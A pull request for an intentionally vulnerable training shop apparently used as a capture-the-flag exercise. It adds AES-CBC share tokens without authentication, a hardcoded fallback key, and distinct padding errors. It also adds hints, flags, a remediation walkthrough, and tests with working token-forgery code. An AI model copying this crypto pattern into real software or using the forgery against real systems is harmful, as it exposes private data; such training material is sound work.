+```typescript
+export function encryptShareToken(plaintext: string): string {
+  const iv = crypto.randomBytes(16);
+  const cipher = crypto.createCipheriv("aes-256-cbc", SHARE_KEY, iv);
+  const encrypted = Buffer.concat([
+    cipher.update(plaintext, "utf8"),
+    cipher.final(),
+  ]);
+  return Buffer.concat([iv, encrypted]).toString("hex");
+  // No HMAC computed over (IV + ciphertext)
+}
+```
+
+Without an HMAC, the server can't tell if someone tampered with the ciphertext before trying to decrypt it. Every modified token hits the decryption logic.
+
+Second, distinguishable error responses:
+
+```typescript
+try {
+  resourcePath = decryptShareToken(token);
+} catch {
+  // Padding error → 400
+  return NextResponse.json(
+    { error: "Invalid share token format" },
+    { status: 400 }
+  );
+}
+
+// Valid padding → resource lookup → 404 if not found
+```
+
+The catch block handles the `decipher.final()` exception (thrown on invalid PKCS#7 padding) and returns 400. If decryption succeeds but the resource doesn't exist, the endpoint returns 404. That difference is all we need.
+
+## Remediation
+
+Switch from AES-CBC to AES-GCM:
+
+```typescript
+import crypto from "crypto";
+
+const ALGORITHM = "aes-256-gcm";
+
+export function encryptShareToken(plaintext: string): string {
+  const iv = crypto.randomBytes(12); // GCM standard nonce size
+  const cipher = crypto.createCipheriv(ALGORITHM, SHARE_KEY, iv);
+  const encrypted = Buffer.concat([
+    cipher.update(plaintext, "utf8"),
+    cipher.final(),
+  ]);
+  const authTag = cipher.getAuthTag(); // 16-byte authentication tag
+  return Buffer.concat([iv, authTag, encrypted]).toString("hex");
+}
+
+export function decryptShareToken(tokenHex: string): string {
+  const data = Buffer.from(tokenHex, "hex");
+  const iv = data.subarray(0, 12);
+  const authTag = data.subarray(12, 28);
+  const ciphertext = data.subarray(28);
+  const decipher = crypto.createDecipheriv(ALGORITHM, SHARE_KEY, iv);
+  decipher.setAuthTag(authTag);
+  return Buffer.concat([
+    decipher.update(ciphertext),
+    decipher.final(),
+  ]).toString("utf8");
+}
+```
+
+With GCM, any modification to the IV, ciphertext, or auth tag causes `decipher.final()` to throw before producing any plaintext. No padding to leak, no oracle.
+
+If you're stuck with CBC for some reason, use Encrypt-then-MAC: compute `HMAC-SHA256(key, IV || ciphertext)` after encryption, verify the HMAC before decryption, and return the same error regardless of what went wrong.

--- a/lib/share-crypto.ts
+++ b/lib/share-crypto.ts
@@ -1,0 +1,32 @@
+import crypto from "crypto";
+
+const ALGORITHM = "aes-256-cbc";
+const IV_LENGTH = 16;
+
+const SHARE_KEY = Buffer.from(
+  process.env.SHARE_ENCRYPTION_KEY ||
+    "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2",
+  "hex"
+);
+
+export function encryptShareToken(plaintext: string): string {
+  const iv = crypto.randomBytes(IV_LENGTH);
+  const cipher = crypto.createCipheriv(ALGORITHM, SHARE_KEY, iv);
+  const encrypted = Buffer.concat([
+    cipher.update(plaintext, "utf8"),
+    cipher.final(),
+  ]);
+  return Buffer.concat([iv, encrypted]).toString("hex");
+}
+
+export function decryptShareToken(tokenHex: string): string {
+  const data = Buffer.from(tokenHex, "hex");
+  const iv = data.subarray(0, IV_LENGTH);
+  const ciphertext = data.subarray(IV_LENGTH);
+  const decipher = crypto.createDecipheriv(ALGORITHM, SHARE_KEY, iv);
+  const decrypted = Buffer.concat([
+    decipher.update(ciphertext),
+    decipher.final(),
+  ]);
+  return decrypted.toString("utf8");
+}

--- a/prisma/seed.ts
+++ b/prisma/seed.ts
@@ -248,6 +248,14 @@ const flags = [
     category: "REQUEST_FORGERY" as const,
     difficulty: "HARD" as const,
   },
+  {
+    flag: "OSS{p4dd1ng_0r4cl3_f0rg3d_t0k3n}",
+    slug: "aes-cbc-padding-oracle",
+    markdownFile: "aes-cbc-padding-oracle.md",
+    walkthroughSlug: "aes-cbc-padding-oracle-forged-share-token",
+    category: "CRYPTOGRAPHIC" as const,
+    difficulty: "HARD" as const,
+  },
 ];
 
 const flagHints: Record<string, string[]> = {
@@ -385,6 +393,11 @@ const flagHints: Record<string, string[]> = {
     "What if someone else could edit your profile for you, without your permission?",
     "The profile update endpoint accepts POST data and has no CSRF protection. The exploit page is served from the same origin. Inspect the admin dashboard source for hidden links.",
     "Find the hidden link to /exploits/csrf-profile-takeover.html in the admin page source. Visit it while logged in. The page sends a request to /api/user/profile that updates your bio with an XSS payload. The endpoint detects the off-page request and returns the flag.",
+  ],
+  "aes-cbc-padding-oracle": [
+    "Encryption without authentication is only half the battle. The share links hide their contents, but the server's reactions speak volumes.",
+    "Generate a share link and tamper with individual bytes of the token. Watch the HTTP status codes carefully: the server responds differently depending on whether decryption itself failed or whether the decrypted content simply doesn't match any known resource.",
+    "The endpoint returns 400 for invalid PKCS#7 padding but 404 when padding is valid. This is a classic padding oracle. Recover the intermediate state of the AES block by brute-forcing each IV byte (up to 256 x 16 = 4096 requests), then forge a new IV so the block decrypts to 'report:internal' instead of 'order:ORD-xxx'.",
   ],
 };
 

--- a/tests/api/aes-cbc-padding-oracle.test.ts
+++ b/tests/api/aes-cbc-padding-oracle.test.ts
@@ -1,0 +1,272 @@
+import {
+  apiRequest,
+  loginOrFail,
+  authHeaders,
+  TEST_USERS,
+  expectFlag,
+} from "../helpers/api";
+import { FLAGS } from "../helpers/flags";
+
+interface ShareResponse {
+  shareUrl: string;
+  token: string;
+}
+
+interface OrderShareData {
+  type: string;
+  order: {
+    id: string;
+    total: number;
+    status: string;
+    customerName: string;
+  };
+}
+
+interface ReportShareData {
+  type: string;
+  title: string;
+  content: string;
+  flag?: string;
+}
+
+describe("AES-CBC Padding Oracle", () => {
+  let bobToken: string;
+
+  beforeAll(async () => {
+    bobToken = await loginOrFail(TEST_USERS.bob.email, TEST_USERS.bob.password);
+  });
+
+  describe("Share link generation", () => {
+    it("POST /api/orders/ORD-001/share returns a share token", async () => {
+      const { status, data } = await apiRequest<ShareResponse>(
+        "/api/orders/ORD-001/share",
+        {
+          method: "POST",
+          headers: authHeaders(bobToken),
+        }
+      );
+
+      expect(status).toBe(200);
+      expect(data).toHaveProperty("token");
+      expect(data).toHaveProperty("shareUrl");
+      expect(data.token).toMatch(/^[0-9a-f]{64,}$/);
+    });
+
+    it("POST /api/orders/ORD-001/share requires authentication", async () => {
+      const { status } = await apiRequest("/api/orders/ORD-001/share", {
+        method: "POST",
+      });
+
+      expect(status).toBe(401);
+    });
+
+    it("POST /api/orders/NONEXISTENT/share returns 404", async () => {
+      const { status } = await apiRequest("/api/orders/NONEXISTENT/share", {
+        method: "POST",
+        headers: authHeaders(bobToken),
+      });
+
+      expect(status).toBe(404);
+    });
+  });
+
+  describe("Share link access", () => {
+    let shareToken: string;
+
+    beforeAll(async () => {
+      const { data } = await apiRequest<ShareResponse>(
+        "/api/orders/ORD-001/share",
+        {
+          method: "POST",
+          headers: authHeaders(bobToken),
+        }
+      );
+      shareToken = data.token;
+    });
+
+    it("GET /api/documents/share?token=<valid> returns order data", async () => {
+      const { status, data } = await apiRequest<OrderShareData>(
+        `/api/documents/share?token=${shareToken}`
+      );
+
+      expect(status).toBe(200);
+      expect(data.type).toBe("order");
+      expect(data.order.id).toBe("ORD-001");
+    });
+
+    it("does not require authentication to access shared order", async () => {
+      const { status, data } = await apiRequest<OrderShareData>(
+        `/api/documents/share?token=${shareToken}`
+      );
+
+      expect(status).toBe(200);
+      expect(data.type).toBe("order");
+    });
+
+    it("returns 400 with missing token", async () => {
+      const { status } = await apiRequest("/api/documents/share");
+      expect(status).toBe(400);
+    });
+
+    it("returns 400 with invalid hex token", async () => {
+      const { status } = await apiRequest(
+        "/api/documents/share?token=not-hex-at-all!"
+      );
+      expect(status).toBe(400);
+    });
+  });
+
+  describe("Padding oracle behavior", () => {
+    let shareToken: string;
+
+    beforeAll(async () => {
+      const { data } = await apiRequest<ShareResponse>(
+        "/api/orders/ORD-001/share",
+        {
+          method: "POST",
+          headers: authHeaders(bobToken),
+        }
+      );
+      shareToken = data.token;
+    });
+
+    it("returns 400 when ciphertext is tampered (bad padding)", async () => {
+      const bytes = Buffer.from(shareToken, "hex");
+      bytes[bytes.length - 1] ^= 0x01;
+      const tampered = bytes.toString("hex");
+
+      const { status, data } = await apiRequest<{ error: string }>(
+        `/api/documents/share?token=${tampered}`
+      );
+
+      expect(status).toBe(400);
+      expect(data.error).toBe("Invalid share token format");
+    });
+
+    it("returns 404 when IV is tampered (valid padding, unknown resource)", async () => {
+      const bytes = Buffer.from(shareToken, "hex");
+      // Flip a byte in the middle of the IV (position 6, inside the "order:" prefix)
+      bytes[6] ^= 0xff;
+      const tampered = bytes.toString("hex");
+
+      const { status, data } = await apiRequest<{ error: string }>(
+        `/api/documents/share?token=${tampered}`
+      );
+
+      // Should be 400 (unsupported type) or 404 (not found), but NOT 200
+      expect([400, 404]).toContain(status);
+      expect(status).not.toBe(200);
+    });
+
+    it("returns different status codes for bad padding vs unknown resource", async () => {
+      const bytes = Buffer.from(shareToken, "hex");
+      const cipherBlock = bytes.subarray(16, 32);
+
+      // Bad padding: random IV that almost certainly won't produce valid padding
+      const badPaddingIv = Buffer.from(
+        "00000000000000000000000000000001",
+        "hex"
+      );
+      const badPaddingToken = Buffer.concat([
+        badPaddingIv,
+        cipherBlock,
+      ]).toString("hex");
+      const { status: badPaddingStatus } = await apiRequest(
+        `/api/documents/share?token=${badPaddingToken}`
+      );
+
+      // Valid padding: use original IV but flip a non-critical byte
+      const { status: validTokenStatus } = await apiRequest(
+        `/api/documents/share?token=${shareToken}`
+      );
+
+      // The oracle: bad padding gives 400, valid token gives 200
+      expect(badPaddingStatus).toBe(400);
+      expect(validTokenStatus).toBe(200);
+    });
+  });
+
+  describe("Type leak in error message", () => {
+    let shareToken: string;
+
+    beforeAll(async () => {
+      const { data } = await apiRequest<ShareResponse>(
+        "/api/orders/ORD-001/share",
+        {
+          method: "POST",
+          headers: authHeaders(bobToken),
+        }
+      );
+      shareToken = data.token;
+    });
+
+    it("leaks supported resource types for unknown type", async () => {
+      // Forge a token that decrypts to a plaintext starting with an unknown type
+      // We use the known plaintext to compute the intermediate state directly
+      const bytes = Buffer.from(shareToken, "hex");
+      const iv = bytes.subarray(0, 16);
+      const cipherBlock = bytes.subarray(16, 32);
+
+      const knownPlaintext = Buffer.from("order:ORD-001\x03\x03\x03");
+      const intermediate = Buffer.alloc(16);
+      for (let i = 0; i < 16; i++) {
+        intermediate[i] = iv[i] ^ knownPlaintext[i];
+      }
+
+      // Forge for "zzzzz:test\x06\x06\x06\x06\x06\x06"
+      const target = Buffer.from("zzzzz:test\x06\x06\x06\x06\x06\x06");
+      const newIv = Buffer.alloc(16);
+      for (let i = 0; i < 16; i++) {
+        newIv[i] = intermediate[i] ^ target[i];
+      }
+      const forgedToken = Buffer.concat([newIv, cipherBlock]).toString("hex");
+
+      const { status, data } = await apiRequest<{ error: string }>(
+        `/api/documents/share?token=${forgedToken}`
+      );
+
+      expect(status).toBe(400);
+      expect(data.error).toContain("Unsupported resource type");
+      expect(data.error).toContain("order");
+      expect(data.error).toContain("report");
+    });
+  });
+
+  describe("Flag retrieval via forged token", () => {
+    it("forged token for report:internal returns the flag", async () => {
+      const { data: shareData } = await apiRequest<ShareResponse>(
+        "/api/orders/ORD-001/share",
+        {
+          method: "POST",
+          headers: authHeaders(bobToken),
+        }
+      );
+
+      const bytes = Buffer.from(shareData.token, "hex");
+      const iv = bytes.subarray(0, 16);
+      const cipherBlock = bytes.subarray(16, 32);
+
+      const knownPlaintext = Buffer.from("order:ORD-001\x03\x03\x03");
+      const intermediate = Buffer.alloc(16);
+      for (let i = 0; i < 16; i++) {
+        intermediate[i] = iv[i] ^ knownPlaintext[i];
+      }
+
+      const target = Buffer.from("report:internal\x01");
+      const newIv = Buffer.alloc(16);
+      for (let i = 0; i < 16; i++) {
+        newIv[i] = intermediate[i] ^ target[i];
+      }
+      const forgedToken = Buffer.concat([newIv, cipherBlock]).toString("hex");
+
+      const { status, data } = await apiRequest<ReportShareData>(
+        `/api/documents/share?token=${forgedToken}`
+      );
+
+      expect(status).toBe(200);
+      expect(data.type).toBe("report");
+      expect(data.title).toBe("Internal Security Audit Report");
+      expectFlag(data, FLAGS.AES_CBC_PADDING_ORACLE);
+    });
+  });
+});

--- a/tests/helpers/flags.ts
+++ b/tests/helpers/flags.ts
@@ -17,7 +17,7 @@ export const FLAGS = {
   SERVER_SIDE_REQUEST_FORGERY: "OSS{s3rv3r_s1d3_r3qu3st_f0rg3ry}",
   SESSION_FIXATION: "OSS{s3ss10n_f1x4t10n_4tt4ck}",
   SQL_INJECTION: "OSS{sql_1nj3ct10n_vuln3r4b1l1ty}",
-  WEAK_JWT_SECRET: "OSS{w34k_jwt_s3cr3t}",
+  WEAK_JWT_SECRET: "OSS{w34k_jwt_s3cr3t_k3y}",
   WEAK_MD5_HASHING: "OSS{w34k_md5_h4sh1ng}",
   X_FORWARDED_FOR_SQL_INJECTION: "OSS{x_f0rw4rd3d_f0r_sql1}",
   XML_EXTERNAL_ENTITY_INJECTION: "OSS{xml_3xt3rn4l_3nt1ty_1nj3ct10n}",
@@ -25,4 +25,5 @@ export const FLAGS = {
   OPEN_REDIRECT: "OSS{0p3n_r3d1r3ct_l0g1n_byp4ss}",
   SELF_XSS_PROFILE_INJECTION: "OSS{s3lf_xss_pr0f1l3_1nj3ct10n}",
   CSRF_PROFILE_TAKEOVER_CHAIN: "OSS{csrf_pr0f1l3_t4k30v3r_ch41n}",
+  AES_CBC_PADDING_ORACLE: "OSS{p4dd1ng_0r4cl3_f0rg3d_t0k3n}",
 } as const;

--- a/tests/unit/share-crypto.test.ts
+++ b/tests/unit/share-crypto.test.ts
@@ -1,0 +1,78 @@
+import { encryptShareToken, decryptShareToken } from "../../lib/share-crypto";
+import crypto from "crypto";
+
+describe("Share Crypto (AES-CBC)", () => {
+  it("encrypts and decrypts a plaintext round-trip", () => {
+    const plaintext = "order:ORD-001";
+    const token = encryptShareToken(plaintext);
+    expect(decryptShareToken(token)).toBe(plaintext);
+  });
+
+  it("produces a 64-char hex token for a 13-byte plaintext (IV + 1 padded block)", () => {
+    const token = encryptShareToken("order:ORD-001");
+    expect(token).toMatch(/^[0-9a-f]{64}$/);
+  });
+
+  it("uses a random IV each time (tokens differ for same plaintext)", () => {
+    const t1 = encryptShareToken("order:ORD-001");
+    const t2 = encryptShareToken("order:ORD-001");
+    expect(t1).not.toBe(t2);
+  });
+
+  it("throws on tampered ciphertext (invalid padding)", () => {
+    const token = encryptShareToken("order:ORD-001");
+    const bytes = Buffer.from(token, "hex");
+    bytes[bytes.length - 1] ^= 0x01;
+    expect(() => decryptShareToken(bytes.toString("hex"))).toThrow();
+  });
+
+  it("does NOT throw when only the IV is tampered (padding stays valid)", () => {
+    const token = encryptShareToken("order:ORD-001");
+    const bytes = Buffer.from(token, "hex");
+    bytes[0] ^= 0x01;
+    expect(() => decryptShareToken(bytes.toString("hex"))).not.toThrow();
+  });
+
+  it("decrypts to different plaintext when IV is tampered", () => {
+    const plaintext = "order:ORD-001";
+    const token = encryptShareToken(plaintext);
+    const bytes = Buffer.from(token, "hex");
+    bytes[0] ^= 0x01;
+    const result = decryptShareToken(bytes.toString("hex"));
+    expect(result).not.toBe(plaintext);
+  });
+
+  it("does not use HMAC or authenticated encryption", () => {
+    const token = encryptShareToken("order:ORD-001");
+    // Token is exactly IV (16) + 1 block (16) = 32 bytes = 64 hex chars
+    // No auth tag appended
+    expect(Buffer.from(token, "hex").length).toBe(32);
+  });
+
+  it("padding oracle distinguishes bad padding from bad plaintext", () => {
+    const token = encryptShareToken("order:ORD-001");
+    const bytes = Buffer.from(token, "hex");
+    const iv = bytes.subarray(0, 16);
+    const cipherBlock = bytes.subarray(16, 32);
+
+    let throwCount = 0;
+    let successCount = 0;
+
+    for (let i = 0; i < 256; i++) {
+      const testIv = Buffer.alloc(16, 0);
+      testIv[15] = i;
+      const testToken = Buffer.concat([testIv, cipherBlock]).toString("hex");
+      try {
+        decryptShareToken(testToken);
+        successCount++;
+      } catch {
+        throwCount++;
+      }
+    }
+
+    // Exactly 1 out of 256 values should produce valid padding
+    // (the one that makes the last decrypted byte equal to 0x01)
+    expect(successCount).toBeGreaterThanOrEqual(1);
+    expect(throwCount).toBeGreaterThanOrEqual(200);
+  });
+});


### PR DESCRIPTION
## Description

Add a "Secure Document Sharing" feature with an intentional AES-CBC Padding Oracle vulnerability. Users can generate encrypted share links for their orders. The share endpoint decrypts AES-256-CBC tokens without HMAC verification and returns distinguishable HTTP status codes for invalid padding (400) vs unknown resource (404), creating a classic padding oracle. Players exploit this to forge a token that decrypts to `report:internal` and retrieve the flag.

Issue: https://github.com/kOaDT/oss-oopssec-store/issues/16

## Type of change

- [ ] Bug fix
- [ ] New feature (e-commerce site improvement)
- [x] New vulnerability / flag
- [x] Walkthrough / writeup
- [ ] Documentation update
- [ ] Other (please describe):

## Testing done

- **Unit tests:** 8 tests verifying AES-CBC encrypt/decrypt behavior, IV randomness, padding oracle distinguishability (255/256 throws vs 1/256 success)
- **API tests:** 12 tests covering share link generation, authentication, oracle behavior (400 vs 404), type leak in error messages, and flag retrieval via forged token
- **E2E tests:** 5 Cypress tests covering the full flow from UI button to forged token flag extraction
Manual end-to-end exploit run with Python padding oracle script (~4096 requests)

## Checklist

- [x] Documentation updated (if applicable)

### If adding a new vulnerability

- [x] Flag added in `prisma/seed.ts` with format `OSS{...}`
- [x] Three progressive hints added in `prisma/seed.ts`
- [x] Vulnerable code path is exploitable and demonstrable
- [x] Markdown documentation added under `content/vulnerabilities/`
- [x] Regression tests added (unit, API, and/or E2E)
- [x] No real-world secrets introduced
